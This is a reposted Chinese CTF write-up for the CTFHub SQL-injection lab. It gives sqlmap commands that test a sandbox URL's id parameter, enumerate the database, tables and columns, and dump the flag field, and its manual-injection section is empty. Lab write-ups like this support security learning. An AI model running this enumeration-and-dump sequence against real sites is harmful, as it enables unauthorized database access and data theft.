SQL注入---数字型注入与字符型注入

数据库 2020-07-24 11:31:15 阅读次数: 0

文章目录

SQLMAP注入
手动注入

SQLMAP注入

①判断注入点
sqlmap.py -u “http://challenge-7fac72c17bef7f22.sandbox.ctfhub.com:10080/?id=1”
发现是一个注入点
在这里插入图片描述
②查询数据库
sqlmap.py -u “http://challenge-7fac72c17bef7f22.sandbox.ctfhub.com:10080/?id=1” --current-db

得到当前数据库sqli
③查询数据表(flag与news)
在这里插入图片描述

④查询字段
sqlmap.py -u “http://challenge-7fac72c17bef7f22.sandbox.ctfhub.com:10080/?id=1” -D “sqli” -T “flag” --columns
在这里插入图片描述

⑤导出数据
sqlmap.py -u “http://challenge-7fac72c17bef7f22.sandbox.ctfhub.com:10080/?id=1” -D “sqli” -T “flag” -C “flag” --dump

在这里插入图片描述

手动注入

猜你喜欢

转载自blog.csdn.net/solitudi/article/details/107537131

SQL注入---数字型注入与字符型注入

Sql注入的分类：数字型+字符型

SQL数字型注入

PIKACHU靶场 ——字符和数字型SQL注入练习

数字型SQL注入学习

sql注入（一）-----数字型

pikachu-sql注入-数字型

【pikachu】-SQL注入（数字型）

DVWA学习Sql注入笔记（数字型sql注入）

SQL注入——数字型union联合注入

通关pikaqu靶场sql注入数字型（一）

SQL注入系列之PHP+Mysql手动注入(一)----数字型

2021-11-09 SQL注入----数字型注入（POST）

风炫安全Web安全学习第十节课到十五课数字型的Sql注入和基于时间和布尔型的Sql注入

sqli-libs————Less2（数字型注入）

实验七：从一个数字型注入认识SQL

SQL数字.字符型漏洞注入再现

SQL注入——字符型union注入

sql注入（二）-------字符型

【pikachu】-SQL注入（字符型）

CTFHub-SQL注入整数型注入字符型注入报错注入布尔盲注

SQL server字段排序，如果字段是字符型的数字，怎么按数字型排序？

SQL注入——报错型注入

DVWA学习Sql注入笔记（字符型sql注入）

SQL注入---SQL注入-数字、字符串、联合查询

ctfhub技能树—sql注入—字符型注入

2021-11-09 SQL注入---字符型注入（GET）

SQL注入（二）：pikachu(一)：MySQL字符型注入（post） --- 字符型注入

oracle to_char()函数--数字型到字符型

字符型注入

今日推荐

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

GCC 14.1 发布

面壁智能发布 Eurux-8x22B 开源大模型 —— 堪称「理科状元」

开源日报 | 谷歌扶持鸿蒙上位；开源Rabbit R1；Docker加持的安卓手机；微软的焦虑和野心；海尔电器把开放平台关了

中国码农的“35岁魔咒”

蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版，免费下载

Arc Browser for Windows 1.0 正式 GA

90后程序员开发视频搬运软件、不到一年获利超 700 万，结局很刑！

周排行

基本数据类型封装类比较 Java源码解读(一) 8种基本类型对应的封装类型

JS实现无缝滚动上

深入解析HashMap原理（基于JDK1.8）

mysql的连接池

关于.htc

linux下的ubuntu12.04图形界面

【数论】好推不好记的扩展欧几里德

设备树详解

cscope + tags 简单设置

xml学习

每日归档

更多

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)

2024-05-03(19)

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)